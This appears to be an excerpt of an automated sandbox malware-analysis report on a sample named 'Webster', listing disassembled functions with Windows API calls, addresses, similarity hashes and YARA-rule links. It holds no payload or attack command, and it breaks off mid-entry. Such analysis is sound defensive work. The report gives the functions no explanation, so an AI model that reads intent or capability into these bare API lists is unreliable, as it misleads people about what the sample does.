                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                  • API String ID: 3974292440-4258414348
                                                                                  • Opcode ID: dc74508d38a4936e7863fbfafb4e556f6e9b47f4492ca246f8836f88ac61c1a1
                                                                                  • Instruction ID: 777f92c8f9cb109fa9700a28dc6388daa6586a727c796ef3957ef47ea404f1a9
                                                                                  • Opcode Fuzzy Hash: dc74508d38a4936e7863fbfafb4e556f6e9b47f4492ca246f8836f88ac61c1a1
                                                                                  • Instruction Fuzzy Hash: 92917C752047019FCB14EF20C691A6ABBE1EF98354F10889DF9965B3E2DB31ED49CB81
                                                                                  Function 00AEE25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?), ref: 00AEE31F
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00AEE32F
                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AEE33B
                                                                                  • __wsplitpath.LIBCMT ref: 00AEE399
                                                                                  • _wcscat.LIBCMT ref: 00AEE3B1
                                                                                  • _wcscat.LIBCMT ref: 00AEE3C3
                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AEE3D8
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AEE3EC
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AEE41E
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AEE43F
                                                                                  • _wcscpy.LIBCMT ref: 00AEE44B
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AEE48A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                  • String ID: *.*
                                                                                  • API String ID: 3566783562-438819550
                                                                                  • Opcode ID: d5d3c271a337c695abca5668efea5f7e505e26038a5df4be24a4566012377e98
                                                                                  • Instruction ID: 39b4d99072d8692de0340166750a7eb4178a354c4177cd9ab68e4846bd244a7a
                                                                                  • Opcode Fuzzy Hash: d5d3c271a337c695abca5668efea5f7e505e26038a5df4be24a4566012377e98
                                                                                  • Instruction Fuzzy Hash: 9C6168725047859FCB10EF65C984A9EB3E8FF89310F04891EF989C7251EB35E945CB92
                                                                                  Function 00AEA27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00AEA2C2
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00AEA2E3
                                                                                  • __swprintf.LIBCMT ref: 00AEA33C
                                                                                  • __swprintf.LIBCMT ref: 00AEA355
                                                                                  • _wprintf.LIBCMT ref: 00AEA3FC
                                                                                  • _wprintf.LIBCMT ref: 00AEA41A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                  • API String ID: 311963372-3080491070
                                                                                  • Opcode ID: 51d8e60b76c2ee9eda58a5e00a97195303d947e64fd0ff2b82d5e6588005d82c
                                                                                  • Instruction ID: 309d70fe4d6502b5399fc343005fe5e7c72fd03a4fd9c5e2b320d13e94422303
                                                                                  • Opcode Fuzzy Hash: 51d8e60b76c2ee9eda58a5e00a97195303d947e64fd0ff2b82d5e6588005d82c
                                                                                  • Instruction Fuzzy Hash: BE51A071A4011AAACF14EBE0CE46EEEB7B9AF14340F600165F505B20A2EF752F58DB61
                                                                                  Function 00AE0065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00ACF8B8,00000001,0000138C,00000001,00000000,00000001,?,00AF3FF9,00000000), ref: 00AE009A
                                                                                  • LoadStringW.USER32(00000000,?,00ACF8B8,00000001), ref: 00AE00A3
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00B47310,?,00000FFF,?,?,00ACF8B8,00000001,0000138C,00000001,00000000,00000001,?,00AF3FF9,00000000,00000001), ref: 00AE00C5
                                                                                  • LoadStringW.USER32(00000000,?,00ACF8B8,00000001), ref: 00AE00C8
                                                                                  • __swprintf.LIBCMT ref: 00AE0118
                                                                                  • __swprintf.LIBCMT ref: 00AE0129
                                                                                  • _wprintf.LIBCMT ref: 00AE01D2
                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AE01E9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                  • API String ID: 984253442-2268648507
                                                                                  • Opcode ID: 93bd56d9dd4b599c738b1e2b44661fc1ac4738b8e655da5053f60aefb3aa7e52
                                                                                  • Instruction ID: 7f393948e8eaf700929f18964360d60b43e177602c14ba20d17ef65681e4312b
                                                                                  • Opcode Fuzzy Hash: 93bd56d9dd4b599c738b1e2b44661fc1ac4738b8e655da5053f60aefb3aa7e52
                                                                                  • Instruction Fuzzy Hash: 7A415F7294011AAACF14FBE0CE96DEEB7B8AF14341F600165F605B2092EF756F49CB61
                                                                                  Function 00AEA995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00AEAA0E
                                                                                  • GetDriveTypeW.KERNEL32 ref: 00AEAA5B
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AEAAA3
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AEAADA
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AEAB08
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                  • API String ID: 2698844021-4113822522
                                                                                  • Opcode ID: 8693ec1d3b1ae90a6feb91778cee2772f03a0b9f8034a192064432dc35310563
                                                                                  • Instruction ID: feb7284aed6c57bfad79289366bcdc89e37fa44054858af76bce6e8135364957
                                                                                  • Opcode Fuzzy Hash: 8693ec1d3b1ae90a6feb91778cee2772f03a0b9f8034a192064432dc35310563
                                                                                  • Instruction Fuzzy Hash: 6B514B712043069FC700EF11CA92D6AB7E4FF98758F50896DF896972A1DB31AD05CB52
                                                                                  Function 00AEA832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AEA852
                                                                                  • __swprintf.LIBCMT ref: 00AEA874
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AEA8B1
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00AEA8D6
                                                                                  • _memset.LIBCMT ref: 00AEA8F5
                                                                                  • _wcsncpy.LIBCMT ref: 00AEA931
                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00AEA966
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00AEA971
                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00AEA97A
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00AEA984
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                  • String ID: :$\$\??\%s
                                                                                  • API String ID: 2733774712-3457252023
                                                                                  • Opcode ID: 278dd66285e8fb19f8ab7963b2850513bc50d001ecfda4648b5a950c7dce7d80
                                                                                  • Instruction ID: e00840882c301f945e3df0cede45ea05ea0e50739a3133c32825432e12e2e33c
                                                                                  • Opcode Fuzzy Hash: 278dd66285e8fb19f8ab7963b2850513bc50d001ecfda4648b5a950c7dce7d80
                                                                                  • Instruction Fuzzy Hash: FB31D27251024AABDB219FA1DC48FEB73BCEF89700F5041B6F508D30A1EB74A7848B25
                                                                                  Function 00B0C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B0982C,?,?), ref: 00B0C0C8
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C0DF
                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C0EA
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C0F7
                                                                                  • GlobalLock.KERNEL32(00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C100
                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C10F
                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C118
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C11F
                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C130
                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B13C7C,?), ref: 00B0C149
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00B0C159
                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00B0C17D
                                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00B0C1A8
                                                                                  • DeleteObject.GDI32(00000000), ref: 00B0C1D0
                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B0C1E6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                  • String ID:
                                                                                  • API String ID: 3840717409-0
                                                                                  • Opcode ID: 9bf057a9e07ebb255910939d1a9381b01c48d7a5555d239c3fc2bb69935fbaf3
                                                                                  • Instruction ID: e308e16a440de1a3d5c1adcd6d6b90f21190f67d7fa8a1c9b173e296507fb409
                                                                                  • Opcode Fuzzy Hash: 9bf057a9e07ebb255910939d1a9381b01c48d7a5555d239c3fc2bb69935fbaf3
                                                                                  • Instruction Fuzzy Hash: F9414B75500208FFDB119F65DC88EAA7FB8EF89711F508158F905E72A0DB709981DB60
                                                                                  Function 00B0C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B0C8A4
                                                                                  • GetFocus.USER32 ref: 00B0C8B4
                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00B0C8BF
                                                                                  • _memset.LIBCMT ref: 00B0C9EA
                                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B0CA15
                                                                                  • GetMenuItemCount.USER32(?), ref: 00B0CA35
                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00B0CA48
                                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B0CA7C
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B0CAC4
                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B0CAFC
                                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B0CB31
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 1296962147-4108050209
                                                                                  • Opcode ID: 4e9e7e06d21cec33b9b19839bc74835f72cd759b3a3595826587069049add575
                                                                                  • Instruction ID: ad7bc20434eb38681d96d4a15e916be5e6fb396565b578f2de069b5e33c6ccc3
                                                                                  • Opcode Fuzzy Hash: 4e9e7e06d21cec33b9b19839bc74835f72cd759b3a3595826587069049add575
                                                                                  • Instruction Fuzzy Hash: 73818B71608305AFDB10DF14C985AABBFE8FB88354F104AADF99593291CB70DD05CBA2
                                                                                  Function 00AD8ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AD8E3C
                                                                                    • Part of subcall function 00AD8E20: GetLastError.KERNEL32(?,00AD8900,?,?,?), ref: 00AD8E46
                                                                                    • Part of subcall function 00AD8E20: GetProcessHeap.KERNEL32(00000008,?,?,00AD8900,?,?,?), ref: 00AD8E55
                                                                                    • Part of subcall function 00AD8E20: HeapAlloc.KERNEL32(00000000,?,00AD8900,?,?,?), ref: 00AD8E5C
                                                                                    • Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AD8E73
                                                                                    • Part of subcall function 00AD8EBD: GetProcessHeap.KERNEL32(00000008,00AD8916,00000000,00000000,?,00AD8916,?), ref: 00AD8EC9
                                                                                    • Part of subcall function 00AD8EBD: HeapAlloc.KERNEL32(00000000,?,00AD8916,?), ref: 00AD8ED0
                                                                                    • Part of subcall function 00AD8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AD8916,?), ref: 00AD8EE1
                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AD8B2E
                                                                                  • _memset.LIBCMT ref: 00AD8B43
                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AD8B62
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00AD8B73
                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00AD8BB0
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AD8BCC
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00AD8BE9
                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AD8BF8
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00AD8BFF
                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AD8C20
                                                                                  • CopySid.ADVAPI32(00000000), ref: 00AD8C27
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AD8C58
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AD8C7E
                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AD8C92
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3996160137-0
                                                                                  • Opcode ID: 5926f60c357b2184974bd5bd475c3ae741e99168c57ba99ab238afbfa3e8700d
                                                                                  • Instruction ID: 4396501bf34a0b2f9c01422483ade888c3629a8ad36ddb87fbe38545bf3d2428
                                                                                  • Opcode Fuzzy Hash: 5926f60c357b2184974bd5bd475c3ae741e99168c57ba99ab238afbfa3e8700d
                                                                                  • Instruction Fuzzy Hash: 91614875910209EFDF10AFA1DD44EEEBB79BF04300F04816AF916A7290DF799A05CB60
                                                                                  Function 00AF7A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 00AF7A79
                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00AF7A85
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00AF7A91
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00AF7A9E
                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00AF7AF2
                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00AF7B2E
                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00AF7B52
                                                                                  • SelectObject.GDI32(00000006,?), ref: 00AF7B5A
                                                                                  • DeleteObject.GDI32(?), ref: 00AF7B63
                                                                                  • DeleteDC.GDI32(00000006), ref: 00AF7B6A
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00AF7B75
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                  • String ID: (
                                                                                  • API String ID: 2598888154-3887548279
                                                                                  • Opcode ID: b43ec1afe32348eeb4f1c919fdc41c10c62546cb9d41d0e4d9fa637f4dfc555f
                                                                                  • Instruction ID: 3929ef2fc870f8ed2e6b49c157a2514838faa8b39d8ab59a0e7544b25599e390
                                                                                  • Opcode Fuzzy Hash: b43ec1afe32348eeb4f1c919fdc41c10c62546cb9d41d0e4d9fa637f4dfc555f
                                                                                  • Instruction Fuzzy Hash: 0E515D71904309EFCB15DFA8CC89EAEBBB9EF48350F14841DFA5AA7250D771A941CB60
                                                                                  Function 00AEA48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00AEA4D4
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 00AEA4F6
                                                                                  • __swprintf.LIBCMT ref: 00AEA54F
                                                                                  • __swprintf.LIBCMT ref: 00AEA568
                                                                                  • _wprintf.LIBCMT ref: 00AEA61E
                                                                                  • _wprintf.LIBCMT ref: 00AEA63C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                  • API String ID: 311963372-2391861430
                                                                                  • Opcode ID: bb43a1855236ae99e21708cb6794a2e137c11bbc98bf3d8e24b8c0755776f8d1
                                                                                  • Instruction ID: 916fa820d9fc6957dd68c57de1b0125657e1e5c34403a4b452fa2ed8c1578c1f
                                                                                  • Opcode Fuzzy Hash: bb43a1855236ae99e21708cb6794a2e137c11bbc98bf3d8e24b8c0755776f8d1
                                                                                  • Instruction Fuzzy Hash: 6551AF7194011AABCF15EBE0CE86EEEB7B9AF15340F604165F505B20A2EF316F58CB61
                                                                                  Function 00AE9710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AE951A: __time64.LIBCMT ref: 00AE9524
                                                                                    • Part of subcall function 00A94A8C: _fseek.LIBCMT ref: 00A94AA4
                                                                                  • __wsplitpath.LIBCMT ref: 00AE97EF
                                                                                    • Part of subcall function 00AA431E: __wsplitpath_helper.LIBCMT ref: 00AA435E
                                                                                  • _wcscpy.LIBCMT ref: 00AE9802
                                                                                  • _wcscat.LIBCMT ref: 00AE9815
                                                                                  • __wsplitpath.LIBCMT ref: 00AE983A
                                                                                  • _wcscat.LIBCMT ref: 00AE9850
                                                                                  • _wcscat.LIBCMT ref: 00AE9863
                                                                                    • Part of subcall function 00AE9560: _memmove.LIBCMT ref: 00AE9599
                                                                                    • Part of subcall function 00AE9560: _memmove.LIBCMT ref: 00AE95A8
                                                                                  • _wcscmp.LIBCMT ref: 00AE97AA
                                                                                    • Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DE1
                                                                                    • Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DF4
